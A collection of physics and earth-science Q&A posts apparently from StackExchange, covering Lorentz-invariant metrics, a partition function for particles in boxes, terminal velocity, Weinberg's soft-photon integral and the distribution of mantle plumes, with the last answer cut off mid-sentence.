Question: I know that transformations that preserve the metric (like the Lorentz transformation, or rotations) have the property: $$S^T \eta S = \eta$$ However, I'm getting: $S^TS = I$ and I'm not sure why: $$\delta^i_j = \eta^{ik}\eta_{kj} = \eta^{ik}\langle \vec{e'_k}, \vec{e'_j}\rangle = \eta^{ik}\langle {S^m}_k\vec{e_m}, {S^n}_j\vec{e_n}\rangle = \eta^{ik}{S^m}_k{S^n}_j\langle \vec{e'_m}, \vec{e_n}\rangle = \eta^{ik}{S^m}_k{S^n}_j\eta_{mn} = \eta^{ik}S_{nk} {S^n}_j = {S_n}^i{S^n}_j = {(S^T)^i}_n{S^n}_j \implies S^TS =I$$ Where $\vec{e'_i}$ are the vectors in the new coordinates, and $\vec{e_i}$ are the vectors in the old coordinate system. I'm not sure where I went wrong. Answer: If by transformations that keep the metric tensor invariant, you mean that the components of $\eta$ do not change either. Under such a case, I think $S^TS = I$ should be OK. Say we have a manifold with metric $g$. Now we pick a point $p$ on this manifold and, at this point, consider two frames, namely {${e_o, e_1, e_2,e_3}$} and {$\tilde{e}_o, \tilde{e}_1, \tilde{e}_2, \tilde{e}_3$}, then the components $\eta_{ab}$ of the metric at $p$ can be calculated in one frame as $$ \tilde{\eta}_{a b} =g\left(\widetilde{e}_a, \widetilde{e}_b\right) $$ Now, if we Lorentz transform to another frame, then \begin{aligned} \tilde{\eta}_{a b} &=g\left(\Lambda^m{ }_a e_m, \Lambda^n{ }_b e_n\right) \\ & =\Lambda^m{ }_a \Lambda^n{ }_b g\left(e_m, e_n\right) \\ & =\Lambda^m{ }_a \Lambda^n{ }_b \eta_{m n} \end{aligned} So if you say that $\tilde{\eta}_{ab} = \eta_{ab}$ then $\Lambda^m{ }_a \Lambda^n{ }_b = 1$.
{ "domain": "physics.stackexchange", "id": 97622, "tags": "metric-tensor, coordinate-systems, vectors, notation, linear-algebra" }
Distributing distinguishable particles in dinstinguishable boxes and computing canonical partition function
Question: I have n distinguishable particles and m distinguishable boxes. If all particles are in the same box the system has an energy of -$\epsilon$ in all the other cases the energy is 0. Now I want to compute the canonical partition function. The Helmhltoz energy and the entropy of the ground state. To start with I would count the number of possibilities to put all particles in single boxes. There are $n!$ ways to arrange n distinguishable particles. And I have m boxes. And last I have $m!$ ways to arrange the different boxes. Therefore I have $n!*m*m!$ possibilities. The next step is to compute all possibilities to distribute n distinguishable particles in m distinguishable boxes. To distribute n particles in m boxes I have $m^{n}$ possibilities for a single configuration. Then I can arrange each configuration in $n!$ ways and last I can arrange the boxes again in $m!$ different ways. Hence the number of remaining possibilities is $$ m^{n}*n!*m!-n!*m*m!. $$ This gives the partition function: $$ Z(m,n,T)=m^{n}*n!*m!-n!*m*m!+n!*m*m!*e^{\beta*\epsilon}=\\ m!*n!*m*(m^{n-1}-1+e^{\beta\epsilon}) $$ Since constant factors in the partition function do not matter when computing averages since they cancel I can neglect the prefactor m!*n!*m The partition function is therefore $$ Z(m,n,T)=m^{n-1}-1+e^{\beta\epsilon} $$ The Hemholtz free energy is then: $$ F=-k_bT*log(m^{n-1}-1+e^{\beta\epsilon}) $$ Now I am not sure if the counting I have done above is correct and the next thing is I am not completely sure how to compute the ground state entropy. The entropy is defined as $S=-k_{b}\sum_{i}p_{i}log(p_i)$ and for as single state it should be $S=-k_{b}*p*log(p)$. The probability for the ground state would then be: $$ p_{G}=\frac{e^{\beta\epsilon}}{m^{n-1}-1+e^{\beta\epsilon}} $$ and hence the entropy $$ S=-\frac{k_b*e^{\beta\epsilon}}{m^{n-1}-1+e^{\beta\epsilon}}*log\left(\frac{e^{\beta\epsilon}}{m^{n-1}-1+e^{\beta\epsilon}}\right) $$ But still I am not quite sure if this is correct especially with the counting I feel very insecure. Thanks for your help Answer: Based on Harrys comments I would like to answer this question to close this thread. It does not matter in which order I put the labeled particles in to the boxes since there are no drawers in the boxes and hence in the end I am not able to differentiate between the order of the particles anymore. This means $B(1,2,3)$ is the same as B(2,1,3) because the balls are lose in this box and are able to roll around freely. The next thing is the boxes have labels this states that box one will always be box one no matter where it is put to on the shelf. Hence there is no need to take into account the permutations of the boxes. Therefore the canonical partition function is just $$ Z(n,m,T)=(m^{n}-m)+me^{\beta\epsilon} $$ The Helmholtz free energy $$ F(n,m,T)=-k_{B}T=log\left( m^{n} - m + e^{\beta\epsilon} \right) $$ And the ground state probability and the entropy stay the same since one m factors out.
{ "domain": "physics.stackexchange", "id": 52368, "tags": "thermodynamics, statistical-mechanics" }
Terminal Velocity
Question: Let Suppose a bullet of 2 gram is falling with the speed of 200km/h. Now how can we know the time after which it gains it terminal velocity. Also when it gain its terminal velocity the force of friction and gravity will becomes equal and it stop accelarating do at this point the force of friction acting on it becomes constant or it go on increasing and also decrease the velocity of object. Answer: It's not actually friction, it's the drag force, also called air resistance. Technically, they're different (even though people do sometimes say "air friction"). The drag force depends on the object's speed, shape, and size, as well as the density of the air, but in the ideal case you can assume that the object's shape and size and the density are constant. In that case, when an object is falling at terminal velocity, the forces on it balance out, which means it has zero acceleration - in other words, its velocity doesn't change. And if the velocity doesn't change, then the drag force, which depends on velocity, won't change either. So the object is "stuck" in a steady state in which the drag force on it will remain constant as it falls. In practice, though, an object never actually reaches terminal velocity unless it starts at terminal velocity. As it gets closer and closer to terminal velocity, the drag force on it gets closer and closer to exactly balancing out the gravitational force, which means that the net force on it, and thus its acceleration, becomes less and less. Basically, as the object gets closer to terminal velocity, the rate at which it continues to approach terminal velocity gets slower. It'll get continually closer to terminal velocity as time goes on, but it never quite reaches it. Last year I wrote a blog post about this issue which discusses it using the actual math. It might be of interest to you.
{ "domain": "physics.stackexchange", "id": 1000, "tags": "gravity, velocity, friction" }
Weinberg soft photon integral
Question: In deriving the rate of emission of arbitrary numbers of soft photons in a general QED process, Weinberg performs the following integral (equations 13.2.8-9): $$-\pi(\vec{p}_m\cdot \vec{p}_n)\int_{\lambda\leq|\vec{q}|\leq\Lambda}\frac{d^3\vec{q}}{|\vec{q}|^3(E_n-\hat{q}\cdot\vec{p}_n)(E_m-\hat{q}\cdot\vec{p}_m)}=\frac{2\pi^2}{\beta_{nm}}\ln\left(\frac{1+\beta_{nm}}{1-\beta_{nm}}\right)\ln\left(\frac{\Lambda}{\lambda}\right)$$ where $$\beta=\sqrt{1-\frac{m_n^2m_m^2}{(\vec{p}_n\cdot\vec{p}_m)^2}}.$$ I am trying to compute this integral for myself but am having some trouble with the angular integral. Would someone mind giving me some assistance? Answer: I think I solved it; unfortunately I don't have time to do all the manipulations after the integral is computed. Let's change to spherical coordinates $$I=-\pi(\vec{p}_m\cdot\vec{p}_n)\int \text{d}q\text{d}\phi \sin(\phi) \text{d}\theta\frac{1}{q}\frac{1}{(E_n-p_n \cos(\phi))(E_m-p_m \cos(\phi))}$$ It follows that: $$I=-\pi(\vec{p}_m\cdot\vec{p}_n)\ln\left(\frac{\Lambda}{\lambda}\right)2\pi \int_0^{\pi}\text{d}\phi \frac{\sin(\phi)}{(E_n-p_n \cos(\phi))(E_m-p_m \cos(\phi))}$$ Now, let's change variables $$x=\cos(\phi) \\ \text{d}x=-\sin(\phi)\text{d}\phi$$ so we have $$I=-2\pi^2(\vec{p}_m\cdot\vec{p}_n)\ln\left(\frac{\Lambda}{\lambda}\right) \int_{-1}^{1}\text{d}x\frac{1}{(E_n-p_n x)(E_m-p_m x)}$$ Now, we have to make the following step: $$\frac{A}{(E_n-p_n x)}+\frac{B}{(E_m-p_m x)}$$ you find that $$A=\frac{-p_n}{E_n p_m-E_m p_n} \\ B=\frac{p_m}{E_np_m-E_mp_n}$$ Then, it's easy to see that $$I=2\pi^2(\vec{p}_m\cdot\vec{p}_n)\ln\left(\frac{\Lambda}{\lambda}\right)\left[\frac{A}{p_n}\ln\left(E_n-p_nx\right)+\frac{B}{p_m}\ln\left(E_m-p_mx\right)\right]^1_{-1}$$ by making $A$ and $B$ explicit we get: $$ I=2\pi^2\frac{(\vec{p}_m\cdot\vec{p}_n)}{E_np_m-E_np_n}\ln\left(\frac{\Lambda}{\lambda}\right) \left[-\ln\left(E_n-p_nx\right)+\ln\left(E_m-p_mx\right)\right]^1_{-1}$$ therefore $$I=2\pi^2\frac{(\vec{p}_m\cdot\vec{p}_n)}{E_np_m-E_np_n}\ln\left(\frac{\Lambda}{\lambda}\right)\left[\ln\left(\frac{E_m-p_m}{E_n-p_n}\right)+\ln\left(\frac{E_n+p_n}{E_m+p_m}\right)\right]$$ and then it's should just be rearranging the factors in a convenient way. I hope that helped!
{ "domain": "physics.stackexchange", "id": 19822, "tags": "homework-and-exercises, quantum-field-theory, quantum-electrodynamics, integration" }
Number of connected components of a random nearest neighbor graph?
Question: Let us sample some big number N points randomly uniformly on $[0,1]^d$. Consider 1-nearest neighbor graph based on such data cloud. (Let us look on it as UNdirected graph). Question What would the number of connected components depending on d ? (As a percent of "N" - number of points.) Simulation below suggest 31% for d=2, 20% for d=20, etc: Percent Dimension: 31 2 28 5 25 10 20 20 15 50 13 100 10 1000 See code below. (One can run it on colab.research.google.com without installing anything on your comp). If someone can comment on more general questions here: https://mathoverflow.net/q/362721/10446 that would be greatly appreciated. !pip install python-igraph !pip install cairocffi import igraph import time from sklearn.neighbors import NearestNeighbors import numpy as np t0 = time.time() dim = 20 n_sample = 10**4 for i in range(10): # repeat simulation 10 times to get more stat X = np.random.rand(n_sample, dim) nbrs = NearestNeighbors(n_neighbors=2, algorithm='ball_tree', ).fit(X) distances, indices = nbrs.kneighbors(X) g = igraph.Graph( directed = True ) g.add_vertices(range(n_sample)) g.add_edges(indices ) g2 = g.as_undirected(mode = 'collapse') r = g2.clusters() print(len(r),len(r)/n_sample*100 , time.time() - t0) Answer: For $n$ uniformly random points in a unit square the number of components is $$\frac{3\pi}{8\pi+3\sqrt{3}}n+o(n)$$ See Theorem 2 of D. Eppstein, M. S. Paterson, and F. F. Yao (1997), "On nearest-neighbor graphs", Disc. Comput. Geom. 17: 263–282, https://www.ics.uci.edu/~eppstein/pubs/EppPatYao-DCG-97.pdf For points in any fixed higher dimension it is $\Theta(n)$; I don't know the exact constant of proportionality but the paper describes how to calculate it.
{ "domain": "cstheory.stackexchange", "id": 5050, "tags": "graph-theory, random-graphs" }
How do i make sure i get the correct Bellman Ford path?
Question: I was studying shortest path algorithms and was met with an issue regarding Bellman Ford for the image below. Following the graph, i see that node 3 has a length of 1 while node 2 has a length of 2. When computing the path from 1 to 8 which is the correct path between 1->2->6->4->7->8 and 1->3->2->6->4->7->8 ? I can see that 1->2->6->4->7->8 has the smallest path length but i'm confused because node 2 has length 2 while node 3 has length 1. Will Bellman always give the shortest possible path or might it output a longer path because one of the nodes had shorter length but led to a longer path? Answer: From Wikipedia: The Bellman–Ford algorithm is an algorithm that computes shortest paths from a single source vertex to all of the other vertices in a weighted digraph. What is a shortest path? According to Wikipedia: In graph theory, the shortest path problem is the problem of finding a path between two vertices (or nodes) in a graph such that the sum of the weights of its constituent edges is minimized. Wikipedia isn't always a reliable source, but in this case the definitions are spot on. Suppose that $G=(V,E,w)$ is a weighted undirected graph. A path between two vertices $x,y \in V$ is a list $$ v_0 = x, v_1, \ldots, v_\ell = y $$ such that $(v_i,v_{i+1}) \in E$ for all $i < \ell$ (possibly $\ell = 0$). The weight of the path is $$ \sum_{i=0}^{\ell-1} w(v_i,v_{i+1}). $$ A shortest path between $x$ and $y$ is a path with minimum weight. The Bellman–Ford algorithm finds the lengths of all shortest paths from a given vertex $x$ to all other vertices. It also generates auxiliary information which makes it possible to find the corresponding shortest paths.
{ "domain": "cs.stackexchange", "id": 17716, "tags": "algorithms, shortest-path" }
Among free quantum field theories, do all 't Hooft anomalies arise from chiral fermions?
Question: In quantum field theory, a global symmetry group that can't be gauged is said to have an 't Hooft anomaly. One of the most familiar examples is the free massless Dirac fermion in $3+1$ dimensional spacetime: it has a global $(U(1)_V\times U(1)_A)/\mathbb{Z}_2$ symmetry, and we can gauge the $U(1)_V$ part to get quantum electrodynamics, but then we can't gauge the rest of it. That's a nice example because it starts with a non-interacting quantum field theory. Many different types of 't Hooft anomaly are known from other quantum field theories, many of them not involving chiral fermions, and non-interacting examples of those would also be nice to have — but slide $13$ in [1] seems to say that such examples don't exist! Here it is in the author's words: For free theories or theories which are free in the UV, all 't Hooft anomalies arise from chiral fermions...$^\dagger$ The statement is probably true (the author is an expert), but I don't know how to deduce it. I'm not even sure I understand what it means, because pages $19$-$22$ in the same presentation review what seems to be an exception, namely the 't Hooft anomaly in the combination of the electric and magnetic $1$-form symmetries of the free electromagnetic field. Isn't that an example of an 't Hooft anomaly in a non-interacting theory that doesn't arise from chiral fermions? What am I missing? Does the previous statement about chiral fermions only apply to conventional ($0$-form) global symmetries? Or is there a sense in which the electromagnetism example isn't "free" (like the lattice version with a compact gauge group)? Question: What exactly are the condition(s) that make the highlighted statement true? The paper [2] has the same title and includes the same author. I haven't finished studying it yet (that will take me a while), but I searched through it and didn't find an answer. Footnote: $^\dagger$ The Dirac fermion example involves "chiral fermions" in the sense that the global symmetry with the anomaly acts independently on the two chiral parts. References: [1] Kapustin, slides titled "Generalized Global Symmetries" (http://physics.berkeley.edu/sites/default/files/_/PDF/kapustin.pdf) [2] Gaiotto et al, "Generalized Global Symmetries", https://arxiv.org/abs/1412.5148 Answer: In my understanding, what the author means in the slides is that the anomalies can be carried by chiral fermions. Namely, that for free theories the 't Hooft anomaly can be realised by inflow through a Chern-Simons term, and so since chiral fermions have the same inflow it can be cancelled by putting chiral fermions in the theory. Reversing the logic if one is interested just in the anomaly they can study it by studying the chiral fermions (see also [1]). This is a special case of the belief that anomalies can always be saturated by symmetry preserving gapless phases [2] (an aside to that, the main claim of [2] was that they can't be always saturated by symmetry preserving gapped phases) [1] L. Alvarez-Gaume and P. H. Ginsparg, The Structure of Gauge and Gravitational Anomalies, Annals Phys. 161 (1985) 423. [2] C. Córdova and K. Ohmori, Anomaly Obstructions to Symmetry Preserving Gapped Phases, [arXiv:1910.04962].
{ "domain": "physics.stackexchange", "id": 66967, "tags": "quantum-field-theory, quantum-anomalies, chirality" }
Do orbiting planets have infinite energy?
Question: I know that planets can't have infinite energy, due to the law of conservation of energy. However, I'm confused because I see a contradiction and it would be great if someone could explain it. Energy is defined as the capacity to do work. Work is defined as Force x Distance. Force is defined as Mass x Acceleration. Thus, if we accelerate a mass for some distance by using some force, we are doing work, and we must have had energy in order to do that work. In orbit, planets change direction, which is a change in velocity, which is an acceleration. Planets have mass, and they are moving over a particular distance. Thus, work is being done to move the planets. In an ideal world, planets continue to orbit forever. Thus, infinite work will be done on the planets as they orbit. How can infinite work be done (or finite work over an infinite time period, if you'd like to think of it that way) with a finite amount of energy? Where is the flaw in this argument? Answer: Your definitions are incorrect. Force is rate of change of momentum and is a vector. More importantly, the work done by a force is not force x distance, it is the force resolved in the direction of the displacement x the magnitude of the displacement. This is more formally known as the scalar product of force and displacement. In the case of a (circular orbit), the centripetal force supplied by gravity is at right angles to the displacement, so no work is done.
{ "domain": "physics.stackexchange", "id": 56389, "tags": "newtonian-mechanics, newtonian-gravity, energy-conservation, orbital-motion, planets" }
Time-Frquency Resolution issues
Question: While Im studying wavelet transform, I have this questions in my mind which can't find it's answer: I understand that when we take longer time windows and take the fourier transform we would suffer in the time resolution, But Why if we take a shorter time window we would suffer in frequency resolution? why longer time intervals are needed for high frequency signals? and shorter time intervals are needed for low frequency signals? In another word, Why we want good frequency resolution for high frequencies and good time resoution for low frequencies? If I have a signal contains frequencies from 0 Hz to 50 Hz, How can I define the range of low and high frequencies? Answer: I understand that when we take longer time windows and take the fourier transform we would suffer in the time resolution, But Why if we take a shorter time window we would suffer in frequency resolution? Imagine that your signal is two different sinusoids that are close in frequency and they both start at phase 0. If the time window is short their end phase will be almost identical because their frequencies are close. Thus, they are difficult to distinguish with a short time window. If the time window is long the end phase will be quite different- eventually they will be opposite phases (180 degrees out of phase), and thus very easy to distinguish. That is why longer time windows give better frequency resolution. why longer time intervals are needed for high frequency signals? and shorter time intervals are needed for low frequency signals? In another word, Why we want good frequency resolution for high frequencies and good time resoution for low frequencies? You do not need longer time intervals for high frequency signals. You'll need to clarify what you're trying to get at on #2 if you want a better response. If I have a signal contains frequencies from 0 Hz to 50 Hz, How can I define the range of low and high frequencies? Again, I'm not sure what you mean. What you define as a "high frequency" or "low frequency" is completely arbitrary. What you will need to do is sample the signal at more than 100 Hz to make sure that the Nyquist frequency is above 50 Hz.
{ "domain": "dsp.stackexchange", "id": 3001, "tags": "signal-analysis, wavelet, time-frequency" }
Clean up if else statement
Question: Background I have a simple logic where i get total_kits. I usually make some function call to get the value for this variable. Then if total_kits is less than some MIN_KITS_THRESHOLD then i want to print some message and do nothing. If is_delivery_created_earlier_today() function returns true i also want to print some message and do nothing. If both those condtions are not violated then i want to call my function launch_pipeline(). I am basically using a if elif else but i am wondering if i can organize my if else statements to be more clean. Code total_kits = #Some number if total_kits < MIN_KITS_THRESHOLD: # print some message but don't launch pipeline elif is_delivery_created_earlier_today(): # print some message but don't launch pipeline else: launch_pipeline() Answer: You have launch_pipeline() shown as a function, so I'll assume that you are comfortable with writing functions. Create a boolean function, something like is_pipeline_allowed(), and put your reasons inside that. total_kits = get_number_of_kits() if is_pipeline_allowed(total_kits): launch_pipeline() Elsewhere: def is_pipeline_allowed(nkits): if nkits < MIN_KITS_THRESHOLD: print("not enough kits for pipeline to launch") return False if is_delivery_created_earlier_today(): print("pipeline has already launched for today") return False return True
{ "domain": "codereview.stackexchange", "id": 40412, "tags": "python" }
What are the disadvantages of Fibonacci Heaps?
Question: A Fibonacci heap is a data structure for priority queue / heap operations. It seems to have the best complexity for all operations: Since it has the best performance, why not use it everywhere? What are the disadvantages of it? Answer: $O(1)$ merely means that no matter how large your heap grows, the operation will always take roughly the same time to execute. It doesn't mean "the fastest". Wikipedia article you linked has section named "Practical considerations": Fibonacci heaps have a reputation for being slow in practice due to large memory consumption per node and high constant factors on all operations. Recent experimental results suggest that Fibonacci heaps are more efficient in practice than most of its later derivatives, including quake heaps, violation heaps, strict Fibonacci heaps, rank pairing heaps, but less efficient than either pairing heaps or array-based heaps.
{ "domain": "cs.stackexchange", "id": 21148, "tags": "algorithms, heaps, priority-queues" }
Is there an online planetarium where the observer is on another celestial body?
Question: I know about in-the-sky.org and its online planetarium feature, but that's from the Earth's perspective. Is there a planetarium (preferably online but if not, that's fine) where the observer is on another celestial body, like the Moon or Mars? Answer: Yes, the free software Stellarium (also Wikipedia) can do that. It has a list of celestial bodies and you select which one you want to be on. When you open Stellarium go to Location Menu (or the button F6 for Windows OS) and that is where you set your viewing point. There might be additional options in Where can I find/visualize planets/stars/moons/etc positions?
{ "domain": "astronomy.stackexchange", "id": 4426, "tags": "software" }
Git, Mercurial, others -- what's the best system for an engineering team new to version control?
Question: I recently started working with a new team doing detailed energy modeling for all flavors of building projects -- commercial, industrial, residential, new construction, renovations, additions. As the team has been growing, we've been discussing three particular problems that I believe version control could help with. Our challenges Coordinating multiple people working on a single energy model. Each building model involves different components -- geometry, envelope, HVAC, lighting, etc. For time-crunched projects different people may work on different components simultaneously. To bring each person's work together at the end can be complicated and time-consuming. Keeping track of "known good versions" for a particular application. To streamline our work we create templates for various building components. Each template may only be ready to use for certain building types (say, HVAC template #n is working for commercial buildings but not tested for residential). When starting a new model we review release notes to make sure we apply the appropriate template, until our periodic review when we test/update templates for all use-cases. Both the tracking of historic versions, and the periodic integration of updates, is complicated and time-consuming. Reproducing results from a report sent to a client. During model development we periodically prepare reports for clients. Each report is tied to a version of the model and templates which is archived on our server. This way we can re-open the old model to address any questions the client has, even as model development has continued. At times we also need to change aspects of the old model to answer specific client questions, before a model update is ready. At this point, the task of integrating two separate streams of model changes becomes... complicated and time consuming. All of these processes can be improved with version control -- but nobody here has ever used version control! I'm wondering if others here have been in a similar position, and implemented a version control system. What did you use, and how did it go? What best practices can you share? Some details about our team and our work All engineers use Windows 10 All of our modeling tools are Win32 applications (eQuest, Open Studio, TRNSYS), but modeling source files are stored as text-based files (not binary) We're considering Git, Mercurial, and Bazaar We do not currently have a server where we could run something like SVN, so we'd prefer a distributed system which could store files on a shared drive (such as a networked drive, SharePoint, DropBox, etc). Answer: To close the loop on this, and in case it's helpful for anyone else in the future... Here's the solution we ended up picking, and a few of the reasons and resources that moved us in that direction. Let me preface by saying, as several have pointed out in the comments and answers, that the key to implementing version control is the mindset change and consistency of following a new process. We had a process that emulated what we do now, but it was complicated, time consuming, and prone to errors. Here's what we ended up doing. git While looking into SVN I found a helpful article, but even more helpful was this comment on the article: "5 reasons, coming from someone who has moved from subversion to git twice voluntarily". The ability to seamlessly work off-line or outside of our internal network were big selling points. A comment I came across a few times (see this answer on softwareengineering.se, for example) is that merging in SVN is complicated, and for those less comfortable with SVN can lead to a reluctance to commit. This defeats the purpose. In contrast, I found this article from Atlassian explaining that in git, "commits are cheap." Version control is most useful when frequent commits are made, so I wanted to lower the bar as much as possible for the team. Because I knew I needed to get a certain level of buy-in before devoting significant resources to the project, setting up a server (such as would be needed for SVN) was off the table. I don't have the skills to do this, and convincing our small team to put time/money into something that they aren't convinced they need (when there are other things we all agree we need but that we can't afford yet) was a non-starter. Of course, this is a Catch-22: If we had a server with SVN set up, we likely could have gotten a satisfactory SVN process going. I set up TortoiseSVN on my PC and used it for a couple of weeks. It was functional, but not exceptional. Once I decided to move away from SVN to DCVC, the choice between Mercurial and git was decided by the fact that I had used git in the past. GitLab Free and open source. We did consider GitHub, but it is limited to three collaborators on private repos. Bitbucket is limited to five users for free teams. As we (and our resources) grow, we may revisit hosting. This part of the process would be relatively easy to change. Sourcetree Based on comments on a forum for energy modeling (which is our use case), I decided to give Sourcetree a try. I found the interface helpful and intuitive. Some other helpful resources: Oliver Steele's "My git workflow". The graphics were particularly useful for explaining git to our team. "Version control for energy models". Helped us think through developing/implementing a workflow for our particular application.
{ "domain": "engineering.stackexchange", "id": 2596, "tags": "modeling, tools" }
Finding a finite model
Question: I know that the question "does a first order formula $\phi$ have a model" is undecidable in general. Could anyone give me a link or a book which give the answer for finite models. If I have a first order formula $\phi$, is it decidable whether $\phi$ has a finite model? I am pretty sure that the question is well known, but I do not even know where to begin the search for an answer. (For example, I would have expected it to be in Libkin's "Elements of finite model theory", but it seems that I can not find it.) The second part of my question is: Are there known restrictions such that the problem is decidable? For example, the problem may become decidable for first-order formula with only monadic predicates. Or when we have monadic predicate plus a successor relation. But I cannot imagine an algorithm to decide if there exists a (finite) model over those restrictions. Answer: The first part of your question is answered by Trakhtenbrot's Theorem. The second part is quite a large question indeed. Depending on the relational structure you're working on, multiple solutions can be given. For instance, if you're interested in formal languages, MSO over word structures corresponds to regular languages, and the matching logic (see this) corresponds to CFL, and thus have their satisfiability problem decidable. You should have a look at Chapter 14 of Libkin, where nice segments of FO are proven to have a decidable satisfiability problem, according to the amount of quantifier alternations allowed.
{ "domain": "cstheory.stackexchange", "id": 3738, "tags": "reference-request, lo.logic, computability, finite-model-theory" }
Quantum states after real world measurements
Question: Regarding measurements of an observable in a quantum system. My understanding, from the postulates of quantum mechanics, is that when we measure an observable quantity, the state of the system collapses to an eigenfunction of the linear Hermitian operator which corresponds to the observable: $$\hat{A}|\psi \rangle = y|y \rangle$$ where $y$ is the eigenvalue and $|y \rangle$ is the eigenstate. Then if we project onto the basis of the observable we get the dirac delta function. Let's consider the position operator for example, then: $$\langle x| \hat{A}|\psi \rangle = y \langle x| y \rangle = y \delta(x-y).$$ From what I understand, in real world measurements the state of the system is not exactly a dirac delta function but rather some wave packet. What is the nature of this wave packet and what determines the shape and corresponding function thereof? Why can't the function be a dirac delta function in real world measurements? Thanks. Answer: A Dirac delta function has a vanishing width. To "collapse" the wavefunction to a delta function, one's measuring apparatus would need to have infinite precision, i.e. zero uncertainty. Since no measuring apparatus is perfect, no measurement can force the wavefunction to have zero uncertainty, i.e. zero width. Therefore, measurement will collapse the wavefunction to a width related in some way to the uncertainty of the measuring apparatus. The shape of the wavefunction following measurement depends on the nature of the measurement act. This would be impossible to model without knowledge about the measuring apparatus.
{ "domain": "physics.stackexchange", "id": 32672, "tags": "quantum-mechanics, wavefunction, measurement-problem, observables" }
JavaScript Payload
Question: I am coding a proof of concept on the danger of JavaScript poisoning, XSS and other client side attacks. Therefore, I coded some JavaScript payloads. As I am not very familiar with JavaScript (I actually hate this language). I would really appreciate if you could give me some recommendations in order to improve the code (logic, syntax, efficiency, more explicit name for the functions). For example, I am aware that I am not making a good use of the callback (I am calling two times getIP when I could call it once and store the IP somewhere but I haven't managed to find how to do that) or my ajaxRequest method which is very similar to my getIP method. My only one requirement is using only pure JavaScript. function ajaxRequest(data) { var xhttp = new XMLHttpRequest(); var url = "http://something/payload.php?"+data; xhttp.open("GET", url, true); xhttp.send(); } function getIP(callback) { var xhttp = new XMLHttpRequest(); var url = "http://something/payload.php?action=getIp"; xhttp.onreadystatechange = function() { if (xhttp.readyState == 4 && xhttp.status == 200) { var jsonObj = JSON.parse(xhttp.responseText); callback(jsonObj.ip); } }; xhttp.open("GET", url, true); xhttp.send(); } function grabDomain(victimIp) { var data = "action=grabDomain&victimIp="+victimIp+"&domain="+document.domain+"&location="+location.pathname+"&cookie="+document.cookie; console.log(data); ajaxRequest(data); } function addFormsKeyLogger(victimIp) { var forms = document.getElementsByTagName("form"); for (i = 0; i < forms.length; i++) { addFormKeyLogger(victimIp, forms[i]); } } function addFormKeyLogger(victimIp, form) { form.addEventListener("submit", function() { var elements = form.elements; var formData = ""; for (j = 0; j < elements.length; j++) { formData += elements[j].name + "=" + elements[j].value + "|"; } if (formData) { sendForm(victimIp, formData); } }, false); } function sendForm(victimIp, formData){ var data = "action=grabForm&victimIp="+victimIp+"&domain="+document.domain+"&location="+location.pathname+"&data="+formData; console.log(data); ajaxRequest(data); } function run() { // We steal the cookies - improvement steal http-only cookies getIP(grabDomain); // We steal the data sent through the forms getIP(addFormsKeyLogger); } run(); Answer: document.getElementsByTagName("form") may be shortened to document.forms. Inside the event listener function inside addFormKeyLogger(), replace form with this. The event target is assigned to the special value this inside event listeners. This also means, that you only need a single instance of the event handler function for each victimIp, since the reference to form is now unnecessary. You can reuse the callback parameter of getIP() by wrapping the two callbacks inside another callback function: getIP(function(victimIp) { grabDomain(victimIp); addFormsKeyLogger(victimIp); }); Encode your URI parameters! Then you don't need to resort to separating them with non-standard characters (| instead of &) for multiple levels of nesting. var data = "action=grabDomain" + "&victimIp=" + encodeURIComponent(victimIp) + "&domain=" + encodeURIComponent(document.domain) + "&location=" + encodeURIComponent(location.pathname) + "&cookie=" + encodeURIComponent(document.cookie); formData += encodeURIComponent(elements[j].name) + "=" + encodeURIComponent(elements[j].value) + "&"; var data = "action=grabForm" + "&victimIp=" + encodeURIComponent(victimIp) + "&domain=" + encodeURIComponent(document.domain) + "&location=" + encodeURIComponent(location.pathname) + "&data=" + encodeURIComponent(formData); Encoding may not be necessary for victimIp and document.domain, since they're only supposed to contain "safe" characters according to the encoding function anyway. If this code seems repetitive to you, I agree with you. Pass dictionary objects with the parameters to a function that builds these parameter strings. Example: function buildParamString(dict) { s = ""; for (var key in dict) { s += s ? "&" : "?"; s += encodeURIComponent(key); var value = dict[key]; if (typeof(value) !== "undefined" && value !== null) s += "=" + encodeURIComponent(value.toString()); } return s; } var params = { action: "grabDomain", victimIp: victimIp, domain: document.domain, location: location.pathname, cookie: document.cookie }; var url = "http://www.example.com/" + buildParamString(params); Wrap the whole thing inside an anonymous function to avoid namespace pollution: (function() { function ajaxRequest(data) { [...] run(); })(); For more information on this topic see What is the purpose of wrapping whole Javascript files in anonymous functions like “(function(){ … })()”?
{ "domain": "codereview.stackexchange", "id": 18557, "tags": "javascript, ajax" }
Are mantle plumes distributed around the core randomly or in a known pattern?
Question: Background: The theory of mantle plumes is useful (although controversial) in explaining the occurrence of intra-plate volcanoes. The website here suggests that "hotspots" exist in fixed locations relative to one another in the core, and thus on a planet like Mars, where there are no tectonic plates, massive volcanoes will form above these "hotspots", but on Earth moving tectonic plates give rise to strings of volcanoes above underlying "hotspots". The quote below is from the linked website: The image on the right shows some of the other "hot spots" scattered about the floor of the Pacific Ocean. It is intriguing, that portions of island chains of similar age are parallel to each other. This suggest that the "hot spots" themselves remain mostly fixed with respect to each other, otherwise the chains might be expect to be curvilinear, or trend in different directions as the "hot spots" generating them moved independantly. Question: Assuming that mantle plumes remain in fixed locations relative to one another at the core, is there any known pattern for how these mantle plumes are distributed relative to one another (or to fixed landmarks, e.g. axis of rotation), or do they appear to be distributed randomly? Answer: First of all, the idea of a fixed "hotspot" reference frame is (albeit reluctantly) falling out of favour on a geological timescale; see e.g. http://onlinelibrary.wiley.com/doi/10.1029/GM121p0339/summary ("As studies of plate motions have advanced, however, it has become clear that the global hotspots do not stay fixed relative to each other...") and http://adsabs.harvard.edu/abs/2010AGUFM.U51A0010S ("Hotspot reference frames can only be confidently tied back to about 130 Ma and there is evidence that mantle plumes have moved relative to each other.") Global Moving Hotspot Reference Frames are in the process of being built, see e.g. http://adsabs.harvard.edu/abs/2010AGUFMGP24A..03D Secondly, identifiable patterns in the distribution of mantle plumes are an area of active research: this year's EGU medal for outstanding young scientist was awarded to Rhodri Davies for his work in this area. Key to most arguments are the presence of Large Low Shear Velocity Provinces (LLSVPs) in the lower mantle, historically assumed to be "slab graveyards" (thermochemical piles created when subducting slabs pool in the lower mantle). The suggestion that these areas were both chemically and thermally distinct from surrounding mantle focussed attention on their margins as a highly probable location for the formation of mantle plumes. However, recent findings (by and cited extensively by Rhodri Davies) increasingly support the idea that these piles are thermal features only, with no chemical difference to surrounding mantle. Rhodri Davies' research revisits past studies that found hotspots were concentrated along the edges of LLSVPs, and has thoroughly demonstrated that these conclusions are not robust, e.g. to choice of hotspot catalogue, prescribed angular search tolerance (between surface expression and imaged margin), (arbitrary) 